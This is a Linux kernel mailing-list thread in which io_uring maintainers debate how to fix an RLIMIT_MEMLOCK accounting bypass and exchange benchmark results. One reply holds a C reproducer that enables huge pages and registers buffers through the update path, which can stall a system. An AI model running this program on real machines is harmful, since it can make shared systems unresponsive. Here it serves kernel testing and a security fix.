>>> The per-context xarray can't coordinate across clones - each context
>>> tracks its own refcount independently. I think we either need a global
>>> xarray (shared across all contexts), or just go back to v2. What do
>>> you think?
>>
>> The Jens' diff is functionally equivalent to your v1 and has
>> exactly same problems. Global tracking won't work well.
> 
> Why not? My thinking was that we just use xa_lock() for this, with
> a global xarray. It's not like register+unregister is a high frequency
> thing. And if they are, then we've got much bigger problems than the
> single lock as the runtime complexity isn't ideal.

1. There could be quite a lot of entries even for a single ring
with realistic amount of memory. If lots of threads start up
at the same time taking it in a loop, it might become a chocking
point for large systems. Should be even more spectacular for
some numa setups.

2. Most likely it'll further relax accounting (i.e. one way
road), and I don't believe that's the right thing. Could even
be unexpected if consolidated w/o any explicit communication
b/w rings (like buffer cloning).

3. Map keys will need to be {page, user, mm}, so I suspect
impl is not going to be exactly trivial either way. Maybe some
nested xarrays + something for counting middle layer entries.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-20 21:45             ` Pavel Begunkov
@ 2026-01-21 14:58               ` Jens Axboe
  2026-01-22 11:43                 ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-21 14:58 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/20/26 2:45 PM, Pavel Begunkov wrote:
> On 1/20/26 17:03, Jens Axboe wrote:
>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>> On 1/20/26 07:05, Yuhao Jiang wrote:
> ...
>>>>
>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>> While working on it, I discovered an issue with buffer cloning.
>>>>
>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>
>>>> The per-context xarray can't coordinate across clones - each context
>>>> tracks its own refcount independently. I think we either need a global
>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>> you think?
>>>
>>> The Jens' diff is functionally equivalent to your v1 and has
>>> exactly same problems. Global tracking won't work well.
>>
>> Why not? My thinking was that we just use xa_lock() for this, with
>> a global xarray. It's not like register+unregister is a high frequency
>> thing. And if they are, then we've got much bigger problems than the
>> single lock as the runtime complexity isn't ideal.
> 
> 1. There could be quite a lot of entries even for a single ring
> with realistic amount of memory. If lots of threads start up
> at the same time taking it in a loop, it might become a chocking
> point for large systems. Should be even more spectacular for
> some numa setups.

I already briefly touched on that earlier, for sure not going to be of
any practical concern.

> 2. Most likely it'll further relax accounting (i.e. one way
> road), and I don't believe that's the right thing. Could even
> be unexpected if consolidated w/o any explicit communication
> b/w rings (like buffer cloning).

Well the aim is to make the accounting actually correct.

> 3. Map keys will need to be {page, user, mm}, so I suspect
> impl is not going to be exactly trivial either way. Maybe some
> nested xarrays + something for counting middle layer entries.

Honestly I think the xarray just needs to go into struct user_struct.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-21 14:58               ` Jens Axboe
@ 2026-01-22 11:43                 ` Pavel Begunkov
  2026-01-22 17:47                   ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-22 11:43 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/21/26 14:58, Jens Axboe wrote:
> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>> On 1/20/26 17:03, Jens Axboe wrote:
>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>> ...
>>>>>
>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>
>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>
>>>>> The per-context xarray can't coordinate across clones - each context
>>>>> tracks its own refcount independently. I think we either need a global
>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>> you think?
>>>>
>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>> exactly same problems. Global tracking won't work well.
>>>
>>> Why not? My thinking was that we just use xa_lock() for this, with
>>> a global xarray. It's not like register+unregister is a high frequency
>>> thing. And if they are, then we've got much bigger problems than the
>>> single lock as the runtime complexity isn't ideal.
>>
>> 1. There could be quite a lot of entries even for a single ring
>> with realistic amount of memory. If lots of threads start up
>> at the same time taking it in a loop, it might become a chocking
>> point for large systems. Should be even more spectacular for
>> some numa setups.
> 
> I already briefly touched on that earlier, for sure not going to be of
> any practical concern.

Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
xarray business, that's 50-100ms. It's all serialised, so multiply by
the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
high spinlock contention, and it jumps again, and there can be more
memory / CPUs / numa nodes. Not saying that it's worse than the
current O(n^2), I have a test program that borderline hangs the
system.

Look, I don't care what it'd be, whether it stutters or blows up the
kernel, I only took a quick look since you pinged me and was asking
"why not". If you don't want to consider my reasoning, as the
maintainer you can merge whatever you like, and it'll be easier for
me as I won't be wasting more time.

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 11:43                 ` Pavel Begunkov
@ 2026-01-22 17:47                   ` Jens Axboe
  2026-01-22 21:51                     ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-22 17:47 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 4:43 AM, Pavel Begunkov wrote:
> On 1/21/26 14:58, Jens Axboe wrote:
>> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>>> On 1/20/26 17:03, Jens Axboe wrote:
>>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>>> ...
>>>>>>
>>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>>
>>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>>
>>>>>> The per-context xarray can't coordinate across clones - each context
>>>>>> tracks its own refcount independently. I think we either need a global
>>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>>> you think?
>>>>>
>>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>>> exactly same problems. Global tracking won't work well.
>>>>
>>>> Why not? My thinking was that we just use xa_lock() for this, with
>>>> a global xarray. It's not like register+unregister is a high frequency
>>>> thing. And if they are, then we've got much bigger problems than the
>>>> single lock as the runtime complexity isn't ideal.
>>>
>>> 1. There could be quite a lot of entries even for a single ring
>>> with realistic amount of memory. If lots of threads start up
>>> at the same time taking it in a loop, it might become a chocking
>>> point for large systems. Should be even more spectacular for
>>> some numa setups.
>>
>> I already briefly touched on that earlier, for sure not going to be of
>> any practical concern.
> 
> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
> xarray business, that's 50-100ms. It's all serialised, so multiply by
> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
> high spinlock contention, and it jumps again, and there can be more
> memory / CPUs / numa nodes. Not saying that it's worse than the
> current O(n^2), I have a test program that borderline hangs the
> system.

It's definitely not worse than the existing system, which is why I don't
think it's a big deal. Nobody has ever complained about time to register
buffers. It's inherently a slow path, and quite slow at that depending
on the use case. Out of curiosity, I ran some stilly testing on
registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
512GB registered in total for the 32 case. Before is the current kernel,
after is with per-user xarray accounting:

before

nthreads 1:      646 msec
nthreads 2:      888 msec
nthreads 4:      864 msec
nthreads 8:     1450 msec
nthreads 16:    2890 msec
nthreads 32:    4410 msec

after

nthreads 1:      650 msec
nthreads 2:      888 msec
nthreads 4:      892 msec
nthreads 8:     1270 msec
nthreads 16:    2430 msec
nthreads 32:    4160 msec

This includes both registering buffers, cloning all of them to another
ring, and unregistering times, and nowhere is locking scalability an
issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
no, I strongly believe this isn't an issue.

IOW, accurate accounting is cheaper than the stuff we have now. None of
them are super cheap. Does it matter? I really don't think so, or people
would've complained already. The only complaint I got on these kinds of
things was for cloning, which did get fixed up some releases ago.

> Look, I don't care what it'd be, whether it stutters or blows up the
> kernel, I only took a quick look since you pinged me and was asking
> "why not". If you don't want to consider my reasoning, as the
> maintainer you can merge whatever you like, and it'll be easier for
> me as I won't be wasting more time.

I do consider your reasoning, but you also need to consider mine rather
than assuming there's only one answer here, or that yours is invariably
the correct one and being stubborn about it. The above test obviously
isn't the end-all be-all of testing, but it would show if we had issues
with scaling to the extent that you assume.

Also worth considering that for these kinds of parallel setups running,
the (by far) common use case is threads. And hence you're going to be
banging on the shared mm anyway for a lot of these memory related setup
operations.

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 17:47                   ` Jens Axboe
@ 2026-01-22 21:51                     ` Pavel Begunkov
  2026-01-23 14:26                       ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-22 21:51 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 17:47, Jens Axboe wrote:
> On 1/22/26 4:43 AM, Pavel Begunkov wrote:
>> On 1/21/26 14:58, Jens Axboe wrote:
>>> On 1/20/26 2:45 PM, Pavel Begunkov wrote:
>>>> On 1/20/26 17:03, Jens Axboe wrote:
>>>>> On 1/20/26 5:05 AM, Pavel Begunkov wrote:
>>>>>> On 1/20/26 07:05, Yuhao Jiang wrote:
>>>> ...
>>>>>>>
>>>>>>> I've been implementing the xarray-based ref tracking approach for v3.
>>>>>>> While working on it, I discovered an issue with buffer cloning.
>>>>>>>
>>>>>>> If ctx1 has two buffers sharing a huge page, ctx1->hpage_acct[page] = 2.
>>>>>>> Clone to ctx2, now both have a refcount of 2. On cleanup both hit zero
>>>>>>> and unaccount, so we double-unaccount and user->locked_vm goes negative.
>>>>>>>
>>>>>>> The per-context xarray can't coordinate across clones - each context
>>>>>>> tracks its own refcount independently. I think we either need a global
>>>>>>> xarray (shared across all contexts), or just go back to v2. What do
>>>>>>> you think?
>>>>>>
>>>>>> The Jens' diff is functionally equivalent to your v1 and has
>>>>>> exactly same problems. Global tracking won't work well.
>>>>>
>>>>> Why not? My thinking was that we just use xa_lock() for this, with
>>>>> a global xarray. It's not like register+unregister is a high frequency
>>>>> thing. And if they are, then we've got much bigger problems than the
>>>>> single lock as the runtime complexity isn't ideal.
>>>>
>>>> 1. There could be quite a lot of entries even for a single ring
>>>> with realistic amount of memory. If lots of threads start up
>>>> at the same time taking it in a loop, it might become a chocking
>>>> point for large systems. Should be even more spectacular for
>>>> some numa setups.
>>>
>>> I already briefly touched on that earlier, for sure not going to be of
>>> any practical concern.
>>
>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>> high spinlock contention, and it jumps again, and there can be more
>> memory / CPUs / numa nodes. Not saying that it's worse than the
>> current O(n^2), I have a test program that borderline hangs the
>> system.
> 
> It's definitely not worse than the existing system, which is why I don't
> think it's a big deal. Nobody has ever complained about time to register
> buffers. It's inherently a slow path, and quite slow at that depending
> on the use case. Out of curiosity, I ran some stilly testing on
> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
> 512GB registered in total for the 32 case. Before is the current kernel,
> after is with per-user xarray accounting:
> 
> before
> 
> nthreads 1:      646 msec
> nthreads 2:      888 msec
> nthreads 4:      864 msec
> nthreads 8:     1450 msec
> nthreads 16:    2890 msec
> nthreads 32:    4410 msec
> 
> after
> 
> nthreads 1:      650 msec
> nthreads 2:      888 msec
> nthreads 4:      892 msec
> nthreads 8:     1270 msec
> nthreads 16:    2430 msec
> nthreads 32:    4160 msec
> 
> This includes both registering buffers, cloning all of them to another
> ring, and unregistering times, and nowhere is locking scalability an
> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
> no, I strongly believe this isn't an issue.
> 
> IOW, accurate accounting is cheaper than the stuff we have now. None of
> them are super cheap. Does it matter? I really don't think so, or people
> would've complained already. The only complaint I got on these kinds of
> things was for cloning, which did get fixed up some releases ago.

You need compound pages

always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled

And use update() instead of register() as accounting dedup for
registration is broken-disabled. For the current kernel:

Single threaded:
1x1G: 7.5s
2x1G: 45s
4x1G: 190s

16x should be ~3000s, not going to run it. Uninterruptible and no
cond_resched, so spawn NR_CPUS threads and the system is completely
unresponsive (I guess it depends on the preemption mode).

-- 
Pavel Begunkov


^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-22 21:51                     ` Pavel Begunkov
@ 2026-01-23 14:26                       ` Pavel Begunkov
  2026-01-23 14:50                         ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Pavel Begunkov @ 2026-01-23 14:26 UTC (permalink / raw)
  To: Jens Axboe, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/22/26 21:51, Pavel Begunkov wrote:
...
>>>> I already briefly touched on that earlier, for sure not going to be of
>>>> any practical concern.
>>>
>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>> high spinlock contention, and it jumps again, and there can be more
>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>> current O(n^2), I have a test program that borderline hangs the
>>> system.
>>
>> It's definitely not worse than the existing system, which is why I don't
>> think it's a big deal. Nobody has ever complained about time to register
>> buffers. It's inherently a slow path, and quite slow at that depending
>> on the use case. Out of curiosity, I ran some stilly testing on
>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>> 512GB registered in total for the 32 case. Before is the current kernel,
>> after is with per-user xarray accounting:
>>
>> before
>>
>> nthreads 1:      646 msec
>> nthreads 2:      888 msec
>> nthreads 4:      864 msec
>> nthreads 8:     1450 msec
>> nthreads 16:    2890 msec
>> nthreads 32:    4410 msec
>>
>> after
>>
>> nthreads 1:      650 msec
>> nthreads 2:      888 msec
>> nthreads 4:      892 msec
>> nthreads 8:     1270 msec
>> nthreads 16:    2430 msec
>> nthreads 32:    4160 msec
>>
>> This includes both registering buffers, cloning all of them to another
>> ring, and unregistering times, and nowhere is locking scalability an
>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>> no, I strongly believe this isn't an issue.
>>
>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>> them are super cheap. Does it matter? I really don't think so, or people
>> would've complained already. The only complaint I got on these kinds of
>> things was for cloning, which did get fixed up some releases ago.
> 
> You need compound pages
> 
> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
> 
> And use update() instead of register() as accounting dedup for
> registration is broken-disabled. For the current kernel:
> 
> Single threaded:
> 1x1G: 7.5s
> 2x1G: 45s
> 4x1G: 190s
> 
> 16x should be ~3000s, not going to run it. Uninterruptible and no
> cond_resched, so spawn NR_CPUS threads and the system is completely
> unresponsive (I guess it depends on the preemption mode).
The program is below for reference, but it's trivial. THP setting
is done inside for convenience. There are ways to make the runtime
even worse, but that should be enough.


#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include "liburing.h"

#define NUM_THREADS 1
#define BUFFER_SIZE (1024UL * 1024 * 1024)
#define MAX_IOVS 64

static int num_iovs = 1;
static void *buffer;
static pthread_barrier_t barrier;

static void *thread_func(void *arg)
{
	struct io_uring ring;
	struct iovec iov[MAX_IOVS];
	int th_idx = (long)arg;
	int ret, i;

	for (i = 0; i < MAX_IOVS; i++) {
		iov[i].iov_base = buffer + i * BUFFER_SIZE;
		iov[i].iov_len  = BUFFER_SIZE;
	}

	ret = io_uring_queue_init(8, &ring, 0);
	if (ret) {
		fprintf(stderr, "ring init failed: %i\n", ret);
		return NULL;
	}

	ret = io_uring_register_buffers_sparse(&ring, MAX_IOVS);
	if (ret < 0) {
		fprintf(stderr, "reg sparse failed\n");
		return NULL;
	}

	pthread_barrier_wait(&barrier);

	ret = io_uring_register_buffers_update_tag(&ring, 0, iov, NULL, num_iovs);
	if (ret < 0)
		fprintf(stderr, "buffer update failed: %i\n", ret);

	printf("thread %i finished\n", th_idx);
	io_uring_queue_exit(&ring);
	return NULL;
}

int main(int argc, char **argv)
{
	pthread_t threads[NUM_THREADS];
	int sys_fd;
	int ret;

	if (argc != 2) {
		fprintf(stderr, "invalid number of arguments\n");
		return 1;
	}
	num_iovs = strtoul(argv[1], NULL, 0);
	printf("register %i GB, num threads %i\n", num_iovs, NUM_THREADS);

	// always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
	sys_fd = open("/sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled", O_RDWR);
	if (sys_fd < 0) {
		fprintf(stderr, "thp sys open failed %i\n", errno);
		return 1;
	}

	const char str[] = "always";
	ret = write(sys_fd, str, sizeof(str));
	if (ret != sizeof(str)) {
		fprintf(stderr, "thp sys write failed %i\n", errno);
		return 1;
	}

	buffer = aligned_alloc(64 * 1024, BUFFER_SIZE * num_iovs);
	if (!buffer) {
		fprintf(stderr, "allocation failed\n");
		return 1;
	}
	memset(buffer, 0, BUFFER_SIZE * num_iovs);

	pthread_barrier_init(&barrier, NULL, NUM_THREADS);
	for (long i = 0; i < NUM_THREADS; i++) {
		ret = pthread_create(&threads[i], NULL, thread_func, (void *)i);
		if (ret) {
			fprintf(stderr, "pthread_create failed for thread %ld\n", i);
			return 1;
		}
	}

	for (int i = 0; i < NUM_THREADS; i++)
		pthread_join(threads[i], NULL);
	pthread_barrier_destroy(&barrier);
	free(buffer);
	return 0;
}

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 14:26                       ` Pavel Begunkov
@ 2026-01-23 14:50                         ` Jens Axboe
  2026-01-23 15:04                           ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 14:50 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 7:26 AM, Pavel Begunkov wrote:
> On 1/22/26 21:51, Pavel Begunkov wrote:
> ...
>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>> any practical concern.
>>>>
>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>> high spinlock contention, and it jumps again, and there can be more
>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>> current O(n^2), I have a test program that borderline hangs the
>>>> system.
>>>
>>> It's definitely not worse than the existing system, which is why I don't
>>> think it's a big deal. Nobody has ever complained about time to register
>>> buffers. It's inherently a slow path, and quite slow at that depending
>>> on the use case. Out of curiosity, I ran some stilly testing on
>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>> after is with per-user xarray accounting:
>>>
>>> before
>>>
>>> nthreads 1:      646 msec
>>> nthreads 2:      888 msec
>>> nthreads 4:      864 msec
>>> nthreads 8:     1450 msec
>>> nthreads 16:    2890 msec
>>> nthreads 32:    4410 msec
>>>
>>> after
>>>
>>> nthreads 1:      650 msec
>>> nthreads 2:      888 msec
>>> nthreads 4:      892 msec
>>> nthreads 8:     1270 msec
>>> nthreads 16:    2430 msec
>>> nthreads 32:    4160 msec
>>>
>>> This includes both registering buffers, cloning all of them to another
>>> ring, and unregistering times, and nowhere is locking scalability an
>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>> no, I strongly believe this isn't an issue.
>>>
>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>> them are super cheap. Does it matter? I really don't think so, or people
>>> would've complained already. The only complaint I got on these kinds of
>>> things was for cloning, which did get fixed up some releases ago.
>>
>> You need compound pages
>>
>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>
>> And use update() instead of register() as accounting dedup for
>> registration is broken-disabled. For the current kernel:
>>
>> Single threaded:
>> 1x1G: 7.5s
>> 2x1G: 45s
>> 4x1G: 190s
>>
>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>> cond_resched, so spawn NR_CPUS threads and the system is completely
>> unresponsive (I guess it depends on the preemption mode).
> The program is below for reference, but it's trivial. THP setting
> is done inside for convenience. There are ways to make the runtime
> even worse, but that should be enough.

Thanks for sending that. Ran it on the same box, on current -git and
with user_struct xarray accounting. Modified it so that 2nd arg is
number of threads, for easy running:

current -git

axboe@r7625 ~> cat /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
[always] inherit madvise never
axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in  178.91 millis    fish           external
   usr time    9.82 millis  313.00 micros    9.51 millis
   sys time  161.83 millis  149.00 micros  161.68 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  638.49 millis    fish           external
   usr time    0.03 secs    285.00 micros    0.03 secs
   sys time    1.14 secs    135.00 micros    1.14 secs

register 4 GB, num threads 4

________________________________________________________
Executed in    2.17 secs    fish           external
   usr time    0.05 secs  314.00 micros    0.05 secs
   sys time    6.31 secs  150.00 micros    6.31 secs

register 8 GB, num threads 8

________________________________________________________
Executed in    4.97 secs    fish           external
   usr time    0.12 secs  299.00 micros    0.12 secs
   sys time   28.97 secs  142.00 micros   28.97 secs

register 16 GB, num threads 16

________________________________________________________
Executed in   10.34 secs    fish           external
   usr time    0.20 secs  294.00 micros    0.20 secs
   sys time  126.42 secs  140.00 micros  126.42 secs


-git + user_struct xarray for accounting

axboe@r7625 ~> cat /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
[always] inherit madvise never
axboe@r7625 ~> for i in 1 2 4 8 16; time ./ppage $i $i; end
register 1 GB, num threads 1

________________________________________________________
Executed in   54.05 millis    fish           external
   usr time   10.66 millis  327.00 micros   10.34 millis
   sys time   41.60 millis  259.00 micros   41.34 millis

register 2 GB, num threads 2

________________________________________________________
Executed in  105.70 millis    fish           external
   usr time   34.38 millis  206.00 micros   34.17 millis
   sys time   68.55 millis  206.00 micros   68.35 millis

register 4 GB, num threads 4

________________________________________________________
Executed in  214.72 millis    fish           external
   usr time   48.10 millis  193.00 micros   47.91 millis
   sys time  182.25 millis  193.00 micros  182.06 millis

register 8 GB, num threads 8

________________________________________________________
Executed in  441.96 millis    fish           external
   usr time  123.26 millis  195.00 micros  123.07 millis
   sys time  568.20 millis  195.00 micros  568.00 millis

register 16 GB, num threads 16

________________________________________________________
Executed in  917.70 millis    fish           external
   usr time    0.17 secs    202.00 micros    0.17 secs
   sys time    2.48 secs    202.00 micros    2.48 secs


-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 14:50                         ` Jens Axboe
@ 2026-01-23 15:04                           ` Jens Axboe
  2026-01-23 16:52                             ` Jens Axboe
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 15:04 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 7:50 AM, Jens Axboe wrote:
> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>> On 1/22/26 21:51, Pavel Begunkov wrote:
>> ...
>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>> any practical concern.
>>>>>
>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>> system.
>>>>
>>>> It's definitely not worse than the existing system, which is why I don't
>>>> think it's a big deal. Nobody has ever complained about time to register
>>>> buffers. It's inherently a slow path, and quite slow at that depending
>>>> on the use case. Out of curiosity, I ran some stilly testing on
>>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>>> after is with per-user xarray accounting:
>>>>
>>>> before
>>>>
>>>> nthreads 1:      646 msec
>>>> nthreads 2:      888 msec
>>>> nthreads 4:      864 msec
>>>> nthreads 8:     1450 msec
>>>> nthreads 16:    2890 msec
>>>> nthreads 32:    4410 msec
>>>>
>>>> after
>>>>
>>>> nthreads 1:      650 msec
>>>> nthreads 2:      888 msec
>>>> nthreads 4:      892 msec
>>>> nthreads 8:     1270 msec
>>>> nthreads 16:    2430 msec
>>>> nthreads 32:    4160 msec
>>>>
>>>> This includes both registering buffers, cloning all of them to another
>>>> ring, and unregistering times, and nowhere is locking scalability an
>>>> issue for the xarray manipulation. The box has 32 nodes and 512 CPUs. So
>>>> no, I strongly believe this isn't an issue.
>>>>
>>>> IOW, accurate accounting is cheaper than the stuff we have now. None of
>>>> them are super cheap. Does it matter? I really don't think so, or people
>>>> would've complained already. The only complaint I got on these kinds of
>>>> things was for cloning, which did get fixed up some releases ago.
>>>
>>> You need compound pages
>>>
>>> always > /sys/kernel/mm/transparent_hugepage/hugepages-16kB/enabled
>>>
>>> And use update() instead of register() as accounting dedup for
>>> registration is broken-disabled. For the current kernel:
>>>
>>> Single threaded:
>>> 1x1G: 7.5s
>>> 2x1G: 45s
>>> 4x1G: 190s
>>>
>>> 16x should be ~3000s, not going to run it. Uninterruptible and no
>>> cond_resched, so spawn NR_CPUS threads and the system is completely
>>> unresponsive (I guess it depends on the preemption mode).
>> The program is below for reference, but it's trivial. THP setting
>> is done inside for convenience. There are ways to make the runtime
>> even worse, but that should be enough.
> 
> Thanks for sending that. Ran it on the same box, on current -git and
> with user_struct xarray accounting. Modified it so that 2nd arg is
> number of threads, for easy running:

Should've tried 32x32 as well, that ends up going deep into "this sucks"
territory:

git

good luck

git + user_struct

axboe@r7625 ~> time ./ppage 32 32
register 32 GB, num threads 32

________________________________________________________
Executed in   16.34 secs    fish           external
   usr time    0.54 secs  497.00 micros    0.54 secs
   sys time  451.94 secs   55.00 micros  451.94 secs

-- 
Jens Axboe

^ permalink raw reply	[flat|nested] 22+ messages in thread

* Re: [PATCH v2] io_uring/rsrc: fix RLIMIT_MEMLOCK bypass by removing cross-buffer accounting
  2026-01-23 15:04                           ` Jens Axboe
@ 2026-01-23 16:52                             ` Jens Axboe
  2026-01-24 11:04                               ` Pavel Begunkov
  0 siblings, 1 reply; 22+ messages in thread
From: Jens Axboe @ 2026-01-23 16:52 UTC (permalink / raw)
  To: Pavel Begunkov, Yuhao Jiang; +Cc: io-uring, linux-kernel, stable

On 1/23/26 8:04 AM, Jens Axboe wrote:
> On 1/23/26 7:50 AM, Jens Axboe wrote:
>> On 1/23/26 7:26 AM, Pavel Begunkov wrote:
>>> On 1/22/26 21:51, Pavel Begunkov wrote:
>>> ...
>>>>>>> I already briefly touched on that earlier, for sure not going to be of
>>>>>>> any practical concern.
>>>>>>
>>>>>> Modest 16 GB can give 1M entries. Assuming 50ns-100ns per entry for the
>>>>>> xarray business, that's 50-100ms. It's all serialised, so multiply by
>>>>>> the number of CPUs/threads, e.g. 10-100, that's 0.5-10s. Account sky
>>>>>> high spinlock contention, and it jumps again, and there can be more
>>>>>> memory / CPUs / numa nodes. Not saying that it's worse than the
>>>>>> current O(n^2), I have a test program that borderline hangs the
>>>>>> system.
>>>>>
>>>>> It's definitely not worse than the existing system, which is why I don't
>>>>> think it's a big deal. Nobody has ever complained about time to register
>>>>> buffers. It's inherently a slow path, and quite slow at that depending
>>>>> on the use case. Out of curiosity, I ran some stilly testing on
>>>>> registering 16GB of memory, with 1..32 threads. Each will do 16GB, so
>>>>> 512GB registered in total for the 32 case. Before is the current kernel,
>>>>> after is with per-user xarray accounting:
>>>>>
>>>>> before
>>>>>
>>>>> nthreads 1:      646 msec
>>>>> nthreads 2:      888 msec
>>>>> nthreads 4:      864 msec
>>>>> nthreads 8:     1450 msec
>>>>> nthreads 16:    2890 msec
>>>>> nthreads 32:    4410 msec
>>>>>
>>>>> after
>>>>>
>>>>> nthreads 1:      650 msec
>>>>> nthreads 2:      888 msec
>>>>> nthreads 4:      892 msec
>>>>> nthreads 8:     1270 msec
>>>>> nthreads 16:    2430 msec
